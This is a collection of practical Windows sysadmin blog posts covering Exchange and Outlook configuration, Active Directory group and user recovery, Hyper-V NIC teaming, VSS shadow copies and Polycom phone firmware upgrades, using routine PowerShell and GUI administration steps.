The reason you do this is because the goal of this situation is to work together and consolidate items down to one spot. Teams try to solve this through email because that is what they are used to using as individuals. But teams need to work together. Email is communication. Email is not issue-tracking, customer-tracking, or proposal-tracking. Teams "feel" like there's a lot going on, but when you look at the actual issues/customers/proposals on hand, there may not be that many. There's a lot of motion but very little movement down field.
These systems track the issues/proposals and consolidate all communication down to those issues. Suddenly, 100 emails boil down to 7 issues, each with a status (such as PENDING or 80%) and an assignment, so you can see who (individual or team) is assigned to the issue/proposal. Initially, you can assign issues/leads/proposals and track them, keeping the communication/email with the lead.
Eventually, you can capture metrics such as win/loss and view a pipeline of what may be coming in the near future.
Here are some tools to consider: Salesforce, HighRise, Zendesk-Inbox.
Sometimes, if you don't need a full CRM, just a simple solution, Zendesk-Inbox might be a good fit. As of this writing, it is in beta.
Quick Tip: See Remote Desktop Connections
To see remote desktop connections (RDP connections):
-type: query user
It will show the connection and the idle time. This way, if you are sharing a username, you can see if the account has been idle so you can connect without disrupting the other person.
HOW WE GOT HERE
THEM: I get a "Windows Security" login when I try to set up Outlook. It should just pick up all the settings automatically through autodiscover after I type in the email address and the password.
ME: Who cares. Everything is working. Type it in twice and move on with life.
THEM: It shouldn't be this way. It wasn't this way at my last place. We just typed in the email address and password and everything automatically worked.
ME: Sigh. I'll look into it.
OUTLOOK ANYWHERE OPTIONS (RPC over HTTP)
Well, I'm glad I did look into it. As covered in my other articles, the fine tuning of an MS EXCHANGE system is what makes it powerful as well as difficult. So why is OUTLOOK ANYWHERE involved? Because all versions of OUTLOOK starting with OUTLOOK 2013 communicate through the OUTLOOK ANYWHERE configuration (aka RPC over HTTP). In this instance, EXCHANGE can change the way OUTLOOK talks to it. There are three options:
• BASIC: a username and password are required while attempting communication with Exchange.
• NTLM: the current Windows user information on the client computer is supplied through cryptographic communication. If that fails, a prompt for the username and password appears. In theory, if the computer is joined to the domain, a username and password are not needed.
• NEGOTIATE: kinda the same thing as NTLM, except it uses a more updated mechanism.
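The three options line up in a rough preference order. As a toy model only (Python, not anything Outlook actually runs — the names and fallback order here are my illustration, not the real protocol negotiation), here's the gist of how a client picks a scheme from what the server advertises:

```python
# Toy model of auth-scheme selection; not real Outlook/Exchange code.
PREFERENCE = ["Negotiate", "NTLM", "Basic"]  # strongest first

def pick_auth(advertised, domain_joined=True):
    """Return (scheme, behavior) for the first advertised scheme we support.
    Basic always needs a typed password; Negotiate/NTLM can silently reuse
    the logged-on Windows credentials when the machine is domain-joined."""
    for scheme in PREFERENCE:
        if scheme in advertised:
            if scheme == "Basic" or not domain_joined:
                return (scheme, "prompt for username/password")
            return (scheme, "silent, uses current Windows logon")
    return (None, "no common scheme")

print(pick_auth(["Basic", "NTLM", "Negotiate"]))  # silent: Negotiate wins
print(pick_auth(["Basic"]))                       # Basic: the "Windows Security" prompt
```

This is why the user above sees a login box: if only BASIC is on offer (or the silent handshake fails), a credential prompt is the fallback.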
In addition to these options, EXCHANGE can have different settings for outside the office and inside the office. By default, EXCHANGE 2016 uses NEGOTIATE for outside the office and NTLM for inside the office.
HOW TO CHANGE OUTLOOK ANYWHERE SETTINGS
To see all the current settings:
Get-outlookanywhere |fl
To see the current settings we are interested in:
Get-OutlookAnywhere |fl Identity,InternalClientAuthenticationMethod,ExternalClientAuthenticationMethod,IISAuthenticationMethods
To set the settings to the default if they have been changed:
Set-OutlookAnywhere -identity "rpc (Default Web Site)" -SSLOffloading $true -InternalClientAuthenticationMethod NTLM -ExternalClientAuthenticationMethod Negotiate -IISAuthenticationMethods Basic,NTLM,Negotiate
NOTES
What's interesting to me is that the builtin documentation claims there are more settings.
To see the builtin documentation:
help set-outlookanywhere -detailed
To see the online documentation:
https://technet.microsoft.com/en-us/library/bb123545(v=exchg.150).aspx
They list out the settings as the following, with no further info on the other options:
Basic | Digest | Ntlm | Fba | WindowsIntegrated | LiveIdFba | LiveIdBasic | WSSecurity | Certificate | NegoEx | OAuth | Adfs | Kerberos | Negotiate | LiveIdNegotiate | Misconfigured
Managing Exchange 2013 Groups
Simplified System
In a simplified logical system, there are the following:
-user: a single individual.
-group: more than one user.
In addition, groups are universal in the company. A group is a group. There are no group types. A group can access resources and receive email.
Windows Server
In the MS world, there are more options for fine-grained control. There is a security-group to access resources and a distribution-group to receive email. (For the curious, these are the only two group types; there are no others.)
Let's begin, shall we?
GET-DISTRIBUTIONGROUP
To see all the distribution groups:
Get-DistributionGroup |select PrimarySMTPAddress
To see all the distribution groups that receive email from the outside world:
Get-DistributionGroup | ?
{$_.RequireSenderAuthenticationEnabled -eq $false} | select PrimarySMTPAddress
To see all the distribution groups that receive email only from within the company (ie that require authenticated senders):
Get-DistributionGroup | ? {$_.RequireSenderAuthenticationEnabled -eq $true} | select PrimarySMTPAddress
Great! Let's move on to the AD side of the system.
GET-ADGROUP
But before we do, note that typically, using a command with "|fl" will let you see all the info. With the get-adgroup command, that doesn't work. You have to use -prop *.
To see all of the AD group properties:
Get-ADGroup -identity "foo-group" -prop *
Also note that the get-adgroup command uses the SAMACCOUNTNAME (it does not use the NAME or DISPLAYNAME like other commands). So if you have an AD group with the name FOO-GROUP-NAME but the SAMACCOUNTNAME FOO-GROUP-SAMACCOUNTNAME, you have to use the SAMACCOUNTNAME:
Get-ADGroup -identity "foo-group-samaccountname" -prop *
To see all the groups (both AD and distribution, as all distribution groups are AD groups):
Get-ADGroup -Filter * -Prop * |select name,samaccountname,mailnickname
To see AD security-groups (groups without email addresses):
Get-ADGroup -filter {GroupCategory -eq "Security"} |select name,samaccountname
To see AD distribution-groups:
Get-ADGroup -Filter 'GroupCategory -eq "Distribution"' -prop * |select name,samaccountname,mailnickname
ISSUES
Theoretically, this list should match the get-distributiongroup list from above. But you might notice some distribution-groups that do not have email addresses. That's kinda strange. What gives?
Sometimes the AD distribution-group does not have the necessary info in the database. Having this info is called being mail-enabled. There's even a command just to handle this.
To mail-enable a distribution group that needs it:
Enable-DistributionGroup -Identity "foo-group"
(NOTE: This will even work on security-groups.)
Also, there are some items in the get-distributiongroup list from above that are not in the get-adgroup list above. What gives?
Well, because groups can be mail-enabled, it is possible for a security-group to be mail-enabled as well.
To see AD security-groups that are mail-enabled:
Get-ADGroup -Filter 'GroupCategory -eq "Security"' -prop * |select name,mailnickname
Finally, as a last question: if both group types (distribution and security) can be mail-enabled, what's the point of having group types? Good question. There isn't one. It's just the way the world works.
Restore Deleted User in Active Directory
• click Start > right-click Command Prompt/PowerShell > select Run as Administrator
• type: ldp
• press Enter
• click CONNECTION > CONNECT
• type in the server name: foo-dc1 (leave everything else as default)
• click OK
• click CONNECTION > BIND
• bullet 'Bind As Currently Logged On User'
• click OK
• click VIEW > TREE
• select DC=domain-name-here,DC=tld (ie DC=daknetworks,DC=com)
• double-click CN=Deleted Objects,DC=domain-name-here,DC=tld (on the left-hand side)
A list of deleted objects will show on the left-hand side and will look like this:
CN=Foo User\0ADEL:d8dae83b-348c-4b48-af63-6ef9eb88b8e3,CN=Deleted Objects,DC=daknetworks,DC=com
• find the user that was deleted.
• double-click on the user.
(the details of the user will show on the right-hand side)
• right-click on the user > Modify
• for ATTRIBUTES, type: isDeleted
• for OPERATION, bullet DELETE
• click ENTER
Now we have to tell AD where to restore the user:
• for ATTRIBUTES, type: distinguishedName
• for VALUES, type the original DN of the object. You can find the last-known location by looking on the right-hand side, where it says "lastKnownParent". Simply add the user's CN before it. For example: CN=foo user,OU=whatever,OU=wherever,OU=allUsers,DC=daknetworks,DC=com
• for OPERATION, bullet REPLACE
• click ENTER
• checkmark EXTENDED (lower-left).
• click RUN.
The user is restored successfully to the OU you defined.
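The distinguishedName you type into the REPLACE step is just the tombstone DN with the \0ADEL mangling stripped off and lastKnownParent substituted in. A hypothetical sketch of that string surgery (Python, illustration only — LDP does the real work, and this treats the DN as the literal text LDP displays):

```python
# Illustration only: builds the distinguishedName value for the REPLACE step
# from the tombstone DN shown under CN=Deleted Objects and lastKnownParent.
def restored_dn(tombstone_dn: str, last_known_parent: str) -> str:
    # The first RDN looks like "CN=Foo User\0ADEL:<guid>"; everything from
    # the \0ADEL: marker onward is the deletion mangling AD added.
    first_rdn = tombstone_dn.split(",", 1)[0]
    clean_rdn = first_rdn.split("\\0ADEL:", 1)[0]
    return f"{clean_rdn},{last_known_parent}"

ts = "CN=Foo User\\0ADEL:d8dae83b-348c-4b48-af63-6ef9eb88b8e3,CN=Deleted Objects,DC=daknetworks,DC=com"
parent = "OU=allUsers,DC=daknetworks,DC=com"
print(restored_dn(ts, parent))  # CN=Foo User,OU=allUsers,DC=daknetworks,DC=com
```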
You might have to re-add some info and re-enable the Exchange mailbox.
Recover Deleted Items from Exchange 2013 | Recover Deleted Items from Outlook 2013 | Recover Deleted Items from Outlook 2016
DEFINITIONS
DELETE - deletes the messages from the folder and moves them into the DELETED-ITEMS folder (or the TRASH folder).
RETENTION - the time during which you can recover items even if the messages were permanently deleted (ie deleted from the DELETED-ITEMS folder).
DISCOVERY
Exchange 2013 will have a RETENTION time for permanently deleted messages. This setting is on the MAILBOX-DATABASE, not on the MAILBOX or individual account. To see the settings, first find all the MAILBOX-DATABASE names and their retention times:
get-mailboxdatabase |select Name,DeletedItemRetention
It will spit out something like:
Name DeletedItemRetention
---- --------------------
Mailbox A 14.00:00:00
Mailbox B 14.00:00:00
Mailbox C 14.00:00:00
Great! You know that you have 14 days to retrieve something that was deleted.
SET RECOVERY
If a retention is not set, or you need to change it on a MAILBOX-DATABASE to, say, 30 days:
set-mailboxdatabase "mailbox b" -DeletedItemRetention 30.00:00:00
(days.hours:minutes:seconds)
RECOVER IN OUTLOOK 2013 | OUTLOOK 2016
-click DELETED-ITEMS (on the left-hand side).
-click RECOVER-DELETED-ITEMS-FROM-SERVER (at the top).
You should see a list of the messages from the last 2 weeks.
-control-click to select the messages you want.
-click OK to restore them.
It should put them back into the folder where they went missing.
RECOVER IN EXCHANGE 2016
If that's too much trouble for the person, then you can do it on their behalf in the EMS.
This will put all the recovery items into a recovery folder called 'foo.user.recovery' in the user's mailbox:
Search-Mailbox foo.user -SearchDumpsterOnly -TargetMailbox foo.user -TargetFolder foo.user.recovery -LogLevel Full
And if you really want to search through the recovery items and restore only some of them:
Search-Mailbox foo.user -SearchQuery "sent: '04/10/17' AND from: 'foo.sender'" -TargetMailbox foo.user -TargetFolder "foo.user.recovery" -LogLevel Full
Create a NIC Team, Create NIC Bond, Create Load-Balancing, LBFO, For Hyper-V
Here's how to create a NIC Team/NIC Bond/Load-Balancing/LBFO setup. This setup is then used in a virtual machine environment for all the VMs to use.
First, update the drivers to Intel's newest drivers (v21.1). We will be using LBFO (LOAD-BALANCING/FAILOVER), which is built into Windows Server, rather than Intel ANS (Advanced Networking Services), which is built into the Intel driver. The reason for this is that ultimately there are too many issues if you do not use what is built into the Windows OS. Updates and other items will keep having trouble with Intel ANS.
Remove Existing Settings
-remove static settings from the existing NICs.
-remove the virtual switch in Hyper-V.
Establish New Settings in PowerShell
-first, see the network adapters you have:
get-netadapter
-rename nic1 to TeamNic1:
rename-netadapter "Local Area Connection" "TeamNic1"
-rename nic2 to TeamNic2:
rename-netadapter "Local Area Connection 2" "TeamNic2"
-create a NIC team with the name ManagementTeam:
new-netlbfoteam -Name "ManagementTeam" -TeamMembers TeamNic1,TeamNic2 -TeamingMode SwitchIndependent -LoadBalancingAlgorithm TransportPorts
-create a virtual switch called ConvergedNetSwitch:
New-VMSwitch "ConvergedNetSwitch" -MinimumBandwidthMode weight -NetAdapterName "ManagementTeam"
-click SERVER-MANAGER (the management gui in Windows Server that shows when you start the server).
-click LOCAL-SERVER (on the left-hand side).
-find NIC-TEAMING (at the top section).
-click ENABLED (next to NIC-TEAMING).
(a window shows)
-right-click MANAGEMENTTEAM (lower-left) > click PROPERTIES.
-click ADDITIONAL-PROPERTIES (at the bottom).
-set SWITCH-INDEPENDENT.
-set ADDRESS-HASH (if you set the HYPER-V-PORT setting instead, each VM will be assigned to a specific NIC).
-set STANDBY as NONE.
To Verify New Settings
-type: get-VMSwitch |fl
-here's my output:
ComputerName : foo
Name : ConvergedNetSwitch
Id : d64482dc-d6d4-4b64-8d24-4105c1ef80a4
Notes :
SwitchType : External
AllowManagementOS : True
NetAdapterInterfaceDescription : Microsoft Network Adapter Multiplexor Driver
AvailableVMQueues : 63
NumberVmqAllocated : 3
IovEnabled : False
IovVirtualFunctionCount : 0
IovVirtualFunctionsInUse : 0
IovQueuePairCount : 0
IovQueuePairsInUse : 0
AvailableIPSecSA : 2048
NumberIPSecSAAllocated : 0
BandwidthPercentage : 100
BandwidthReservationMode : Weight
DefaultFlowMinimumBandwidthAbsolute : 0
DefaultFlowMinimumBandwidthWeight : 1
Extensions : {Microsoft NDIS Capture, Microsoft Windows Filtering Platform}
IovSupport : False
IovSupportReasons : {This network adapter does not support SR-IOV.}
IsDeleted : False
Start New Settings
-reboot to make sure the settings survive a reboot.
NOTES
***To be clear, this is set for LOAD-BALANCING (not FAILOVER).*** We would need another NIC to enable failover. Simply add the NIC to the team, then choose that NIC to be the STANDBY ADAPTER.
A real team/bond requires configuration on the switches (or, more specifically, on the switch ports) to create an EtherChannel. If you are going to do this, make it easy on yourself and make certain all the switches are the same model. Then make certain they all have the same OS before stacking. Once stacked, configure the EtherChannel.
Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder"
SCENARIO
You try to share a calendar in Outlook 2016. When the person who has EDITOR access rights adds the shared calendar to their Outlook, they get the following message: "You Don't Have Permission To Create An Entry In This Folder...."
RESOLUTION
There can be many reasons why this is happening. Ultimately, it is a permission issue or a cached-permission issue.
1-check to see if the calendar has the correct permissions.
Show Calendar Permissions
Get-MailboxFolderPermission foo.user:\calendar
Add Calendar Permissions
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor
In my case, the non-working mailbox calendar had the correct permissions and it still didn't work.
2-temporarily change the primary smtp address on the shared account.
Don't ask me why, but I've witnessed that if the shared account (shared.account@domain.tld) changes the primary smtp email address domain (shared.account@otherdomain.tld), sometimes the person trying to access the calendar can suddenly edit the calendar if they remove the calendar and add it back in. Here's how...
In OUTLOOK, where you are trying to access the shared calendar:
-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click on the calendar name.
-click DELETE CALENDAR (don't worry, this only removes the calendar from your view. It doesn't actually delete the calendar).
-close OUTLOOK.
-change the primary smtp via ECP (web interface) from shared.account@domain.tld to shared.account@otherdomain.tld.
-open OUTLOOK.
-be sure the address is updated in the ADDRESS-BOOK (global-address-list).
-click CALENDAR (bottom-left).
-find OTHER CALENDARS.
-right-click OTHER CALENDARS > ADD CALENDAR > OPEN SHARED CALENDAR.
-type in the name of the person.
-click OK.
-wait about 10 seconds.
WORKS WITH NEW DOMAIN!!! And they can edit the calendar.
-remove the shared calendar (same as above).
-change the primary smtp via ECP (web interface) from shared.account@otherdomain.tld back to shared.account@domain.tld.
-add the calendar (same as above).
WORKS WITH ORIGINAL DOMAIN!!! And they can edit the calendar.
It is important to note that changing it via the Exchange Management Shell (EMS) did not work and resulted in the original error:
Set-Mailbox foo.user -PrimarySmtpAddress shared.account@otherdomain.tld
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor
I'm not sure if this is an emailaddresses issue. Or a missing value in one of the keys that is changed in the ECP and not in the EMS. Or if it is a global-address cache issue. Or if it is a GAL sync issue that takes time. All I can tell you is that I performed the steps above and it worked. Took me a good 30 hours or so to figure that out.
In any event, I checked the following, but nothing produced any meaningful results concerning this issue:
Get-mailboxpermission foo.user |fl
Get-Mailbox foo.user | Select-Object -ExpandProperty EmailAddresses
Get-CalendarProcessing foo.user |fl
Get-CASmailbox foo.user |fl
3-check the offlineaddressbook setting for the mailboxdatabase.
Somewhere along the line, during the initial install, a CU update or the creation of a new mailboxdatabase, the OFFLINEADDRESSBOOK key is left blank/null. I think it would automatically default to the default address book, but I really don't know. I haven't found any info that says having a null value is bad, but most info I see says to set it for all mailboxdatabases.
Find the name of the OFFLINE ADDRESS BOOK:
Get-OfflineAddressBook |select name
Now set the MAILBOXDATABASE(s) to use that name:
Get-Mailboxdatabase | Set-MailboxDatabase -OfflineAddressBook "Default Offline Address Book (Ex2013)"
NOTES
Calendar permissions can be set individually or by role.
The DEFAULT role permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, CreateSubfolders, FolderVisible
Or, another way to view the DEFAULT role is like this (the minus is what the role doesn't have):
ReadItems
CreateItems
EditOwnedItems
EditAllItems
CreateSubfolders
FolderVisible
-DeleteOwnedItems
-DeleteAllItems
-FolderOwner
-FolderContact
The EDITOR role permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, FolderVisible, DeleteOwnedItems, DeleteAllItems
Or, another way to view the EDITOR role is like this (the minus is what the role doesn't have):
ReadItems
CreateItems
EditOwnedItems
EditAllItems
-CreateSubfolders
FolderVisible
DeleteOwnedItems
DeleteAllItems
-FolderOwner
-FolderContact
GET PERMISSIONS TO MAILBOX
Sometimes getting the permissions to the mailbox helps:
Get-MailboxPermission foo.user
GET PERMISSIONS THAT OTHER USERS HAVE TO THE MAILBOX
Sometimes it helps to see who else has permission to the mailbox:
Get-MailboxPermission foo.user |?
{$_.IsInherited -ne "true" -and $_.User -ne "NT AUTHORITY\SELF"}
CHANGE PERMISSION TO MAILBOX
Sometimes you need to change permissions on the mailbox:
Set-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess
ADD PERMISSION TO MAILBOX
Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess
REMOVE PERMISSION FROM MAILBOX
Remove-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess
SEE COMPLETE FOLDER STRUCTURE
Sometimes seeing the complete folder structure of the mailbox helps:
get-MailboxFolder foo.user:\ -recurse
GET THE CALENDAR NAME
Sometimes getting the calendar name helps, because it may have been changed to another language:
Get-MailboxFolderStatistics foo.user |where-object {$_.FolderType -eq "Calendar" } |select-Object Name
ADD CALENDAR FOLDER PERMISSIONS
Sometimes you need to add permissions to the calendar:
Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor
REMOVE CALENDAR FOLDER PERMISSIONS
Sometimes you need to remove permissions from the calendar:
Remove-MailboxFolderPermission -Identity foo.user:\calendar -User foo.user2
SEE MAILBOXES IN AN ORGANIZATIONAL UNIT
Sometimes you need to see the mailboxes in a single AD OU:
get-mailbox -OrganizationalUnit "ou=where-ever,ou=whatever-users,dc=domain,dc=tld" -resultsize unlimited |get-mailboxstatistics |ft DisplayName,TotalItemSize,Itemcount
REMOVE CACHED SHARED CALENDAR FOLDERS IN OUTLOOK 2016:
Sometimes working off of cached shared calendar folders causes an issue and you need to stop caching them in OUTLOOK 2016:
-account-settings > email > change > more-settings > advanced
-uncheck "Download Shared Folders"
-restart OUTLOOK
REMOVE CACHED FOLDERS IN OUTLOOK 2016:
Sometimes working off of cached folders causes an issue and you need to remove all the cached folders from OUTLOOK 2016:
-account-settings > email > change
-uncheck "Use Cached Exchange Mode"
-click NEXT > FINISHED
-restart OUTLOOK
Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS
I had a new 10K server and wanted to test it out before making changes. The goal is to turn it into a VM, test out connecting to the HQ domain, and replicate the domain and DNS. In this situation, the branch office already had a domain. The location was purchased by HQ and needed to roll into the HQ domain.
A couple of notes before we begin:
-keep your domain flat. If you can, do NOT do subdomains, trusts, etc. It's too much of a pain later on. Keep it simple.
-you can have 2 domains on the same network (just not 2 DHCP servers).
CREATE VIRTUAL MACHINE
HYPER-V is included in WINDOWS-10. So all we have to do is create a new VHDX from the existing SSD that came with the server.
-connected the SSD to WINDOWS-10 via a USB caddy.
-created a server-2012r2 VM with DISK2VHD (you only need the main partition).
-started HYPER-V.
-created a new VM (do not import, etc).
-attached the newly created VHDX; no-network, 4 processors, 10GB ram.
-booted for the first time.
-shutdown.
-created a VSWITCH: external-network & allow-management-operating-system-to-share-this-network-adapter (no vlan id).
-attached the VSWITCH to the VM.
-on the HQ AD server: ad-sites-services > subnets > create subnets-for-branch-office & attach to branch-office.
-on the HQ AD server: ad-sites-services > inter-site-transports > ip > create new > hq/branch > 15 mins.
JOIN BRANCH OFFICE SERVER TO HQ DOMAIN
Simple enough, but if you've never done it before you might be thinking there's something more to it. There isn't.
-start the VM
-change DNS to the DNS at HQ
-join the domain
-restart
PROMOTE BRANCH OFFICE SERVER AS DOMAIN CONTROLLER
-click NEXT > NEXT > NEXT
-click ACTIVE-DIRECTORY-DOMAIN-SERVICES
-let it go through its setup.
-click promote to DOMAIN-CONTROLLER (upper-right flag)
-select DNS SERVER & GC (global catalog)
-accept defaults until INSTALL.
-click INSTALL
-wait
-server reboots

REPLICATE BRANCH OFFICE SERVER DOMAIN CONTROLLER
-check USERS&COMPUTERS to see if it is in DOMAIN-CONTROLLERS
-check SITES&SERVICES
-view all servers are correct.
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW
-cycle through all NTDS SETTINGS
-right-click NTDS-SETTINGS > ALL-TASKS > CHECK-REPLICATION-TOPOLOGY
-cycle through all NTDS SETTINGS (on the new server, the largest delta is 'unknown')
-click NTDS SETTINGS
-right-click right-panel
-click REPLICATE-NOW (on the new server, notice the time is now a few seconds)
High-five!!!

NOTES:

CTS2600
I have a storage array with 12 3.5" drives. It's a little older but it works. It has an LSI sticker on it. I pop in some hard drives, plug in the Ethernet connection and power it on. Now, how do I control it? There is no monitor connection. So, I look at the DHCP server to find the IP address. I put the IP address in the browser but nothing shows. With a tool, I see that it is showing as a NETAPP device. Hmmm... I thought it was LSI but OK. I do a little googling and find that NETAPP purchased the storage array division from LSI. So I go to the NETAPP (who acquired LSI) web site for support. I see that it needs a program called SANTRICITY. SANTRICITY isn't offered as a free download, I have to register for it. No problem. I provide the SERIAL-NUMBER on the device and wait. I receive a message from NETAPP stating that they won't provide support since they made it for someone else who branded it as their own. Also known as an OEM. It even states so in their LSI acquisition document: http://mysupport.netapp.com/NOW/public/apbu/oemcp/NetApp_Engenio_Support_Integration_FAQ.pdf
But who is the OEM? I don't know. There are no markings on the device. This OEM is supposed to provide SANTRICITY or a rebrand of the app to control the storage device. I find out that the device is actually an LSI CTS2600. The LSI CTS2600 was made for DELL as the POWERVAULT MD3200.
I download the DELL software but it doesn't find the array that is booted. I try a couple more times without success. I finally hear back from NETAPP that the OEM is BLUEARC. Great! A little more googling and I see that it is a BlueArc Mercury 50. BLUEARC was purchased by HITACHI. Humph... I sign up for access to the Hitachi support web site. The BLUEARC software was incorporated into HITACHI COMMAND SUITE. Support writes back that there is no support contract on the device so they will not provide any help. Now I have a 20K SAN that boots and physically works but I have no way to control it or manage it. In other words, I have a 20K boat anchor. Good thing there are FTP sites with admins that don't lock them up :-)

System Volume Information Folder Size
If you are "missing" free space, and only have a few GB left when you should have many GB left (or TB), the culprit could likely be:
• -a permission issue. You cannot see the size of a folder if you do not have read permissions to access the folder.
You can see if there are SHADOWS by following the instructions in the previous post. One item that VSSADMIN and DISKSHADOW will not show is the size of the SHADOW. Bummer. The Windows OS saves these SHADOWS in the SYSTEM VOLUME INFORMATION folder. For various reasons, a typical administrator does not have permissions to that folder. This causes an issue because you cannot know the size of the folder through EXPLORER. So how do you know the size of the SYSTEM VOLUME INFORMATION folder? Here's how, using robocopy:
• robocopy "c:\System Volume Information" c:\dummy /l /xj /e /nfl /ndl /njh /r:0 /b
For most other items, WINDIRSTAT will show you the way.

A shadow is a copy of a file or a volume. This can be done even while the file is in use. The proper name for this is Volume Snapshot Service or Volume Shadow Copy Service or VSS. And it works at a block level (rather than a file level).
There are a couple of parts to this but the heart of the technology is the VOLUME SHADOW COPY SERVICE which performs the actual copy. The transfer of the data is called a PROVIDER. While Windows comes with its own PROVIDER, other software companies can create their own providers. An example of a built-in PROVIDER is SYSTEM RESTORE or PREVIOUS VERSIONS for a file or folder. An example of an outside software company is SHADOWPROTECT. While SHADOWPROTECT is an outside company, it still relies on VSS to create the shadow on its behalf. SHADOWPROTECT does not create its own shadow.

The shadows are traditionally managed by VSSADMIN. Here's how to show all PROVIDERS in either powershell or command-line:
vssadmin list providers
And here's how to show the SHADOWS:
vssadmin list shadows
And here's how to show the SHADOW storage:
vssadmin list shadowstorage

VSSADMIN is not the only tool. Another tool gives more info. That is DISKSHADOW. DISKSHADOW is an interactive command interpreter like DISKPART. What I've found is that DISKSHADOW is a more accurate and more powerful tool. Here's how to enter DISKSHADOW interactive:
diskshadow
Here's how to show all PROVIDERS:
list providers
Here's how to show all SHADOWS:
list shadows all
It will show all the SHADOWS, whether created for a built-in provider or for a 3rd party provider. And it will show the provider ID for each shadow.

To add info, you should be able to limit the size of a shadow:
• -computer-management
• -right-click SHARED-FOLDERS (on the left-hand side)
• -click SETTINGS for each drive and adjust the size as you see fit.
NOTE: you can also do this in the DISK-MANAGEMENT snap-in.

Upgrading Polycom Phones Across Entire Location
Upgrading all the Polycom phones across an entire location has been a mission. Again, there's so much mis-information and there are so many different setups that it is hard to weed through it all. In short, you need 2 files uploaded to your phone-server for each model of phone-set. The 2 files are:
• the sip/uc-software/application (sip.ld) file.
• the bootrom (bootrom.ld) file.
(or if you have a SoundStation 6000/7000, you need the B version here: 2345-12560-001.bootrom.ld

3-Take all the BOOTROM files and upload them to your phone-server (provisioning server) in the tftpboot directory. (fyi - the tftpboot directory will be at the root of the filesystem: /tftpboot.) The chart below shows what bootrom goes with what phone-set model.

FILES                        DESCRIPTION
bootrom.ld                   Concatenated BootROM
2345-12345-001.bootrom.ld    ????? (Probably SoundPoint IP 300/302/320/330)
2345-12360-001.bootrom.ld    SoundPoint IP 321
2345-12365-001.bootrom.ld    SoundPoint IP 331
2345-12375-001.bootrom.ld    SoundPoint IP 335
2345-12450-001.bootrom.ld    SoundPoint IP 450
2345-12500-001.bootrom.ld    SoundPoint IP 550
2345-12560-001.bootrom.ld    SoundPoint IP 560
2345-12600-001.bootrom.ld    SoundPoint IP 650
2345-12670-001.bootrom.ld    SoundPoint IP 670
3111-15600-001.bootrom.ld    SoundStation IP 6000
3111-30900-001.bootrom.ld    SoundStation IP 5000
3111-40000-001.bootrom.ld    SoundStation IP 7000
3111-19000-001.sip.ld        SoundStation Duo
3111-46135-002.sip.ld        VVX 300
3111-46161-001.sip.ld        VVX 310
3111-46157-002.sip.ld        VVX 400
3111-46162-001.sip.ld        VVX 410
3111-44500-001.sip.ld        VVX 500
3111-44600-001.sip.ld        VVX 600
2345-17960-001.sip.ld        VVX 1500
3111-36150-001.sip.ld        SpectraLink 8440
3111-36152-001.sip.ld        SpectraLink 8450
3111-36154-001.sip.ld        SpectraLink 8452
3111-33215-001.sip.ld        SoundStructure

Great! You are halfway there.

THE SIP.LD FILE
1-First, look at the Polycom Matrix for older phones (ie SOUNDPOINT/SOUNDSTATION phones) here:
Or the Polycom Matrix for newer phones (ie VVX phones) here:
(Hopefully it's obvious, the MS Lync is for MS Lync servers. If you do not know what that is, don't worry about it as it is not the one you need).
(As of this writing the Current General Availability for SOUNDPOINT phone-sets is v4.0.11).
3-unzip the download and inside the folder, you will see SIP.LD files like: 2345-12560-001.sip.ld
4-Take all the LD files and upload them to your phone-server (provisioning server) in the tftpboot directory.
5-Once there, rename the file according to your system. I had to rename the files as such: sip.SPIP560.4.0.11.revc.ld

REBOOT
Now reboot the phone. It should upgrade the bootrom and then upgrade the application/sip.ld. This process may take around 10 minutes per phone. If you have a POE switch, you can do this across the network by unplugging the POE switch, waiting about 1 minute, and plugging the POE switch back in. Then wait about 15 minutes for all the phones to upgrade. (Of course, do this during an after-hours time period.)

CONFIG FILES
From here, there might be some troubleshooting. Namely, some of the old config files may not work with the most recent firmware. Edit the files accordingly in the tftpboot directory. Each phone will have a MAC-address number on the back. Something like, 0004123EDT78. So, each phone will have a base-config file of mac-number.cfg. Something like, 0004123EDT78.cfg
This file will determine what SIP.LD file to use and what further config files to use.
Before the update, the contents will look something like this:

<APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld"
 CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.3.2.3.revc.cfg"
 MISC_FILES="0004123EDT78-directory.xml"
 LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY="">
 <APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
 <APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
</APPLICATION>

After the update, you need to edit the file to look something like this:

<APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].4.0.11.revc.ld"
 CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.4.0.11.revc.cfg"
 MISC_FILES="0004123EDT78-directory.xml"
 LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY="">
 <APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
 <APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/>
</APPLICATION>

You can do this file-by-file if needed. Or you can run one command on the phone-server.
1-make sure you are in the tftpboot directory
2-make a directory for the backup of the files: mkdir cfgfiles
3-copy all the base config files into this directory: cp ./000*.cfg ./cfgfiles
